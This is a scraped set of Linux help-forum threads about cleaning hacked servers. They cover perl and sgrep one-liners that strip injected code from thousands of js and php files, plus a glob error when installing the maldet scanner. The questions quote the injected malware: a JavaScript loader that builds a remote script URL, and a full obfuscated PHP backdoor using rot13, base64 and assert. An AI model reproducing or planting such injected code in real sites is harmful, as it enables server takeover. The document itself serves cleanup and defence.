now; I hope it can't spread to my Windows partition? EDIT: I'm using Linux Mint as my personal OS so no networks are affected. I'll just wipe the drive.
Linux Mint: I'm infected with a rootkit
perl will have to 'slurp' up the whole file in order to match the \n characters, so use the -0777 option:
perl -i -0777pe 's/var hglgfdrr4634hezfdg = 1; var d=document;var s=d\.createElement\(\x27script\x27\); s\.type=\x27text\/javascript\x27; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,\.\.\.,106,115\); s\.src=pl;\nif \(document\.currentScript\) {\ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else {\nd\.getElementsByTagName\(\x27head\x27\)\[0]\.appendChild\(s\);\n}\n//' script.js
Although with a hacked server there are likely more problems that need to be addressed.
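To run the same substitution over many files rather than a single script.js, one option (a sketch, assuming the infected files are the .js files under the web root and that you have a backup) is to let find hand them to perl in batches:

# Sketch: replace PATTERN with the regular expression from the one-liner above,
# and adjust /var/www to your web root. -i edits in place, so back up first
# (or use -i.bak to keep copies of the originals).
find /var/www -type f -name '*.js' -exec perl -0777 -i -pe 's/PATTERN//' {} +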
A server of mine was hacked, and they added the following at the beginning of every js file:
var hglgfdrr4634hezfdg = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,...,106,115); s.src=pl;
if (document.currentScript) {
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
I need to clean them, and I can't do it manually since there are thousands of files. I'm struggling to find a working solution; I read about perl and wrote this:
perl -pi -e 's/var hglgfdrr4634hezfdg = 1; var d=document;var s=d\.createElement\(\x27script\x27\); s\.type=\x27text\/javascript\x27; s\.async=true;\nvar pl = String\.fromCharCode\(104,116,...,106,115\); s\.src=pl;\nif \(document\.currentScript\) \{\ndocument\.currentScript\.parentNode\.insertBefore\(s, document\.currentScript\);\n} else \{\nd\.getElementsByTagName\(\x27head\x27\)\[0\]\.appendChild\(s\);\n\}//' script.js
I tried it on regex101 and the regex matches, and the command gives no errors, but nothing is replaced...
Replace (remove) multiple lines from files
In cd maldetect-*, all files and directories that match that pattern are expanded on the command line. You have at least the .tar.gz file, and probably also the directory that was extracted from it. You can only be in one directory at a time, so cd with multiple arguments makes no sense. In cd "maldetect-*", there's no expansion. The command itself is fine, but you probably don't have a directory with an asterisk in its name, so there's nothing to cd to. If you know you only ever have one directory that matches the pattern, you could use cd maldetect-*/ with a trailing slash to ask the shell to expand only directory names. If you can have multiple directories that match the pattern, you'll have to either find the newest one or look inside the archive to find the name of the directory there. Finding the newest is discussed in BashFAQ 003 (or maybe BashFAQ 099), and probably in some questions on-site, like "Find newest file. Multiple Filetype restrictions". In the trivial case where all file names are known to be nice, ls -tr | tail -1 might work, but see Why you shouldn't parse the output of ls(1). Of course it shouldn't be too hard to peek inside the archive, though this also assumes the archive is 'nice' in a number of ways:
$ tar tzf maldetect-current.tar.gz | head -1 | cut -d/ -f1
maldetect-1.6.2
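Putting that last idea together, one way to cd into whatever top-level directory the archive actually contains (a sketch that assumes the tarball's first entry is that top-level directory, as it is for the maldetect release shown above):

# Derive the directory name from the archive instead of guessing with a glob.
dir=$(tar tzf maldetect-current.tar.gz | head -1 | cut -d/ -f1)
cd "$dir" || exit 1
bash ./install.sh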
I'm installing Maldet on Debian 9.3:
cd /usr/local/src
wget http://www.rfxn.com/downloads/maldetect-current.tar.gz
tar -xzvf maldetect-current.tar.gz
cd maldetect-*
bash ./install.sh
While doing cd maldetect-* I got:
Bash: Too many arguments
I tried doing cd "maldetect-*" but this command is invalid. Why can't I access the dir?...
cd fails when trying to enter maldetect version-agnostic directory
If you want to edit text defined by a context-free language (nested, matching begin and end tags, e.g. HTML or XML), you should use a tool made for that rather than a tool for regular expressions. One such tool is sgrep (available as a package for many Linux distros): you can match (nested) regions defined by beginning and ending tags, and manipulate them. So, for example,
sgrep -o '%r\n' '(start .. end) extracting ("<?php".."?>" containing "###=CACHE START=###")'
will remove any region starting with <?php and ending with ?> that contains ###=CACHE START=### from your file, by printing all the other regions separated by a newline. Newlines and white space are not considered relevant for matching, so multiline matches come for free.
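To apply that across a whole tree rather than one file, something along these lines could work (a sketch, not tested against your data: it assumes sgrep accepts file name arguments and writes the filtered result to stdout, and it overwrites files in place, so work on a backup copy first):

# Sketch: run the sgrep expression above over every .php file under /var/www/html
# and replace each file with the filtered output. Test on copies before running for real.
find /var/www/html -type f -name '*.php' -exec sh -c '
  for f in "$@"; do
    sgrep -o "%r\n" "(start .. end) extracting (\"<?php\"..\"?>\" containing \"###=CACHE START=###\")" "$f" > "$f.clean" &&
    mv "$f.clean" "$f"
  done
' sh {} +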
I have a server with thousands of files containing a multi-line pattern that I want to globally find & replace. Here's a sample of the pattern: <div class="fusion-header-sticky-height"></div> <div class="fusion-header"> <div class="fusion-row"> <?php avada_logo(); ?> <?php avada_main_menu(); ?> </div> </div><?php //###=CACHE START=### @error_reporting(E_ALL); @ini_set("error_log",NULL); @ini_set("log_errors",0); @ini_set("display_errors", 0); @error_reporting(0); $wa = ASSERT_WARNING; @assert_options(ASSERT_ACTIVE, 1); @assert_options($wa, 0); @assert_options(ASSERT_QUIET_EVAL, 1);$strings = "as"; $strings .= "se"; $strings .= "rt"; $strings2 = "st"; $strings2 .= "r_r"; $strings2 .= "ot13"; $gbz = "riny(".$strings2("base64_decode"); $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtMKWlo3WspzIjo3W0nJ5aXQNcBjccMvtuMJ1jqUxbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXFxtrlOyL2uiVPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftsFOyoUAyVUfXWUIloPN9VPWbqUEjBv8ioT9uMUIjMTS0MKZhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhqKWfMJ5wo2EyXPEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKFxhVvMcCGRznQ0vYz1xAFtvZwSxLGVkAwqzBJEvBTSwAwV4ZwLkMGp3AQyvLJH1ZwDkZFVcBjccMvuzqJ5wqTyioy9yrTymqUZbVzA1pzksnJ5cqPVcXFO7PvEwnPN9VTA1pzksnJ5cqPtxqKWfXGfXL3IloS9mMKEipUDbWTAbYPOQIIWZG1OHK0uSDHESHvjtExSZH0HcB2A1pzksp2I0o3O0XPEwqKWfYPOQIIWZG1OHK0ACGx5SD1EHFH1SG1IHYPN1XGftL3IloS9mMKEipUDbWTA1pzjfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfXL3IloS9woT9mMFtxL2tcBjc9VTIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXFN9CFNkXFO7PvEcLaLtCFOznJkyK2qyqS9wo250MJ50pltxqKWfXGfXsDccMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtoJD1XT1xAFtxK1WSHIISH1EoVaNvKFxcVQ09VPVkAwN0MwH5ZmxjZwp3ZGVlBGp1BJDjMQHkAGyzA2HkLvVcVUftMKMuoPumqUWcpUAfLKAbMKZbWS9FEISIEIAHJlWwVy0cXGftsDcyL2uiVPEcLaL7PtxWPK0tsD=="));'); $strings($light); //###=CACHE END=### ?>I've tried various methods to find and replace this string but its multiline nature has got me stumped. I've looked around extensively (over a day of searching) and the solutions I've found can't handle the multi-line nature of this. Any assistance would be most welcome.UPDATE I've got a solution now, largely thanks to the accepted answer. Others facing something similar should look at my github project for this.
Global multiline search & replace